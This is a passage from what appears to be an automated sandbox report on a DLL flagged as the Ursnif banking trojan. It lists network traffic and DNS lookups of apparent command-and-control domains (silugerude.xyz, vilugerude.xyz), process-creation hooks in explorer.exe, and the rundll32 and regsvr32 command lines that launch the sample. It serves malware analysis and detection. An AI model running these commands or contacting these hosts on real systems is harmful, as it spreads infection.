Apr 29, 2021 00:30:21.403878927 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:21.477246046 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:21.575838089 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:21.627401114 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:23.685395002 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:23.755359888 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:25.582295895 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:25.653811932 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:27.789261103 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:27.859184980 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:34.430053949 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:34.498940945 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:35.242523909 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:35.313147068 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:36.691657066 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:36.742610931 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:37.769855022 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:37.837140083 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:37.861160994 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:37.909698963 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:38.788182020 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:38.839653969 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:39.485586882 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:39.539123058 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:39.943448067 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:39.992816925 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:41.088957071 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:41.138406992 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:42.399477959 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:42.450694084 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:43.532232046 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:43.585443974 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:44.474169970 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:44.547657013 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:44.930588961 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:44.982343912 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:46.165719032 CEST	50904	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:46.215612888 CEST	53	50904	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:58.088000059 CEST	57525	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:58.201714039 CEST	53	57525	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:59.076783895 CEST	53814	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:59.192529917 CEST	53	53814	8.8.8.8	192.168.2.4
Apr 29, 2021 00:30:59.695628881 CEST	53418	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:30:59.762561083 CEST	53	53418	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:00.203699112 CEST	62833	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:00.313088894 CEST	53	62833	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:00.779359102 CEST	59260	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:00.847600937 CEST	53	59260	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:01.306648016 CEST	49944	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:01.375190973 CEST	53	49944	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:01.421638966 CEST	63300	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:01.497067928 CEST	53	63300	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:01.820357084 CEST	61449	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:01.890427113 CEST	53	61449	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:02.452389956 CEST	51275	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:02.560910940 CEST	53	51275	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:03.211534977 CEST	63492	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:03.260546923 CEST	53	63492	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:03.657011032 CEST	58945	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:03.725691080 CEST	53	58945	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:13.773139000 CEST	60779	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:13.821717978 CEST	53	60779	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:13.922099113 CEST	64014	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:13.997073889 CEST	53	64014	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:15.338896036 CEST	57091	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:15.408967018 CEST	53	57091	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:17.752294064 CEST	55904	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:17.836957932 CEST	53	55904	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:17.838876963 CEST	52109	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:17.908853054 CEST	53	52109	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:17.913626909 CEST	54450	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:17.982822895 CEST	53	54450	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:27.102576971 CEST	49374	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:27.171983957 CEST	53	49374	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:27.173542023 CEST	50436	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:27.297441006 CEST	53	50436	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:27.300270081 CEST	62605	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:27.369368076 CEST	53	62605	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:39.786381960 CEST	54256	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:39.871810913 CEST	53	54256	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:46.941226959 CEST	52189	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:46.991405010 CEST	53	52189	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:47.994390011 CEST	56131	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:48.065033913 CEST	53	56131	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:48.566711903 CEST	62992	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:48.639230967 CEST	53	62992	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:49.515775919 CEST	54432	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:49.660721064 CEST	53	54432	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:49.662369013 CEST	57227	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:49.731046915 CEST	53	57227	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:49.734118938 CEST	58383	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:49.804056883 CEST	53	58383	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:51.391952038 CEST	63136	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:51.459352016 CEST	53	63136	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:51.461177111 CEST	50911	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:51.528657913 CEST	53	50911	8.8.8.8	192.168.2.4
Apr 29, 2021 00:31:51.533924103 CEST	63409	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:31:51.601377010 CEST	53	63409	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:01.227142096 CEST	59185	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:01.300076008 CEST	53	59185	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:03.942337036 CEST	64236	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:04.009548903 CEST	53	64236	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:06.474354982 CEST	56157	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:06.551212072 CEST	53	56157	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:10.475807905 CEST	55601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:10.544632912 CEST	53	55601	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:11.053152084 CEST	52984	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:11.245531082 CEST	53	52984	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:13.057512999 CEST	51141	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:13.143815041 CEST	53	51141	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:13.408149004 CEST	53610	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:13.477674961 CEST	53	53610	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:16.153336048 CEST	61247	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:16.236583948 CEST	53	61247	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:34.312751055 CEST	65165	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:34.382237911 CEST	53	65165	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:35.558938980 CEST	52076	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:35.631773949 CEST	53	52076	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:37.053118944 CEST	54903	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:37.125632048 CEST	53	54903	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:38.531414986 CEST	55045	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:38.580140114 CEST	53	55045	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:39.956579924 CEST	54464	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:40.026747942 CEST	53	54464	8.8.8.8	192.168.2.4
Apr 29, 2021 00:32:41.402108908 CEST	50970	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:32:41.469525099 CEST	53	50970	8.8.8.8	192.168.2.4
Apr 29, 2021 00:33:22.186379910 CEST	59809	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:33:22.186439037 CEST	55261	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:33:22.236403942 CEST	53	55261	8.8.8.8	192.168.2.4
Apr 29, 2021 00:33:22.239192009 CEST	53	59809	8.8.8.8	192.168.2.4
Apr 29, 2021 00:33:22.476408005 CEST	51278	53	192.168.2.4	8.8.8.8
Apr 29, 2021 00:33:22.559585094 CEST	53	51278	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 29, 2021 00:29:48.781426907 CEST	192.168.2.4	8.8.8.8	0x2777	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:54.719871044 CEST	192.168.2.4	8.8.8.8	0x695d	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:55.304100037 CEST	192.168.2.4	8.8.8.8	0x1810	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:55.466943026 CEST	192.168.2.4	8.8.8.8	0x3844	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.576152086 CEST	192.168.2.4	8.8.8.8	0x9267	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.699147940 CEST	192.168.2.4	8.8.8.8	0x8f0	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.920466900 CEST	192.168.2.4	8.8.8.8	0x2f94	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:59.827832937 CEST	192.168.2.4	8.8.8.8	0x3508	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Apr 29, 2021 00:31:39.786381960 CEST	192.168.2.4	8.8.8.8	0xbd5d	Standard query (0)	silugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:31:48.566711903 CEST	192.168.2.4	8.8.8.8	0x4750	Standard query (0)	silugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:01.227142096 CEST	192.168.2.4	8.8.8.8	0x26cf	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:03.942337036 CEST	192.168.2.4	8.8.8.8	0x628e	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:06.474354982 CEST	192.168.2.4	8.8.8.8	0x3960	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:10.475807905 CEST	192.168.2.4	8.8.8.8	0xebdc	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:11.053152084 CEST	192.168.2.4	8.8.8.8	0x3aab	Standard query (0)	silugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:13.057512999 CEST	192.168.2.4	8.8.8.8	0x162	Standard query (0)	silugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:13.408149004 CEST	192.168.2.4	8.8.8.8	0x22cc	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:16.153336048 CEST	192.168.2.4	8.8.8.8	0xae67	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:34.312751055 CEST	192.168.2.4	8.8.8.8	0x50d	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:35.558938980 CEST	192.168.2.4	8.8.8.8	0xbe9b	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:37.053118944 CEST	192.168.2.4	8.8.8.8	0xf60b	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:38.531414986 CEST	192.168.2.4	8.8.8.8	0x6018	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:39.956579924 CEST	192.168.2.4	8.8.8.8	0x564d	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:41.402108908 CEST	192.168.2.4	8.8.8.8	0x6de4	Standard query (0)	vilugerude.xyz	A (IP address)	IN (0x0001)
Apr 29, 2021 00:33:22.186379910 CEST	192.168.2.4	8.8.8.8	0x737c	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Apr 29, 2021 00:33:22.186439037 CEST	192.168.2.4	8.8.8.8	0xba3	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 29, 2021 00:29:48.831512928 CEST	8.8.8.8	192.168.2.4	0x2777	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:29:54.804292917 CEST	8.8.8.8	192.168.2.4	0x695d	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:29:55.378654957 CEST	8.8.8.8	192.168.2.4	0x1810	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:55.378654957 CEST	8.8.8.8	192.168.2.4	0x1810	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:55.547595978 CEST	8.8.8.8	192.168.2.4	0x3844	No error (0)	contextual.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.655493975 CEST	8.8.8.8	192.168.2.4	0x9267	No error (0)	hblg.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.778717041 CEST	8.8.8.8	192.168.2.4	0x8f0	No error (0)	lg3.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Apr 29, 2021 00:29:57.991914034 CEST	8.8.8.8	192.168.2.4	0x2f94	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:29:59.900219917 CEST	8.8.8.8	192.168.2.4	0x3508	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:29:59.900219917 CEST	8.8.8.8	192.168.2.4	0x3508	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:30:37.861160994 CEST	8.8.8.8	192.168.2.4	0x8ed8	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 29, 2021 00:31:39.871810913 CEST	8.8.8.8	192.168.2.4	0xbd5d	No error (0)	silugerude.xyz		185.186.245.157	A (IP address)	IN (0x0001)
Apr 29, 2021 00:31:48.639230967 CEST	8.8.8.8	192.168.2.4	0x4750	No error (0)	silugerude.xyz		185.186.245.157	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:01.300076008 CEST	8.8.8.8	192.168.2.4	0x26cf	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:04.009548903 CEST	8.8.8.8	192.168.2.4	0x628e	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:06.551212072 CEST	8.8.8.8	192.168.2.4	0x3960	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:10.544632912 CEST	8.8.8.8	192.168.2.4	0xebdc	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:11.245531082 CEST	8.8.8.8	192.168.2.4	0x3aab	No error (0)	silugerude.xyz		185.186.245.157	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:13.143815041 CEST	8.8.8.8	192.168.2.4	0x162	No error (0)	silugerude.xyz		185.186.245.157	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:13.477674961 CEST	8.8.8.8	192.168.2.4	0x22cc	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:16.236583948 CEST	8.8.8.8	192.168.2.4	0xae67	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:34.382237911 CEST	8.8.8.8	192.168.2.4	0x50d	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:35.631773949 CEST	8.8.8.8	192.168.2.4	0xbe9b	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:37.125632048 CEST	8.8.8.8	192.168.2.4	0xf60b	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:38.580140114 CEST	8.8.8.8	192.168.2.4	0x6018	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:40.026747942 CEST	8.8.8.8	192.168.2.4	0x564d	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:32:41.469525099 CEST	8.8.8.8	192.168.2.4	0x6de4	No error (0)	vilugerude.xyz		185.186.245.185	A (IP address)	IN (0x0001)
Apr 29, 2021 00:33:22.236403942 CEST	8.8.8.8	192.168.2.4	0xba3	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Apr 29, 2021 00:33:22.239192009 CEST	8.8.8.8	192.168.2.4	0x737c	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 29, 2021 00:29:55.499727011 CEST	104.20.185.68	443	192.168.2.4	49751	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 29, 2021 00:29:55.499727011 CEST	104.20.185.68	443	192.168.2.4	49751	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Apr 29, 2021 00:29:55.499758005 CEST	104.20.185.68	443	192.168.2.4	49750	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 29, 2021 00:29:55.499758005 CEST	104.20.185.68	443	192.168.2.4	49750	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA5EFC

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA5EFC

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6880 Parent PID: 6028

General

Start time:	00:29:44
Start date:	29/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\laka4.dll'
Imagebase:	0x160000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838142140.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.938999366.00000000031BC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.780693607.0000000000BD0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838200660.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838181374.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838052469.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838002362.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838240951.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.838099477.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.837840447.00000000033B8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6912 Parent PID: 6880

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6920 Parent PID: 6880

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\laka4.dll
Imagebase:	0x1210000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909665638.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909829429.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909904535.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909762591.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909865416.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909891092.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909848147.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.909807581.0000000005738000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1013072792.000000000553C000.00000004.00000040.sdmp, Author: Joe Security Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000002.00000002.1030930479.00000000010B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 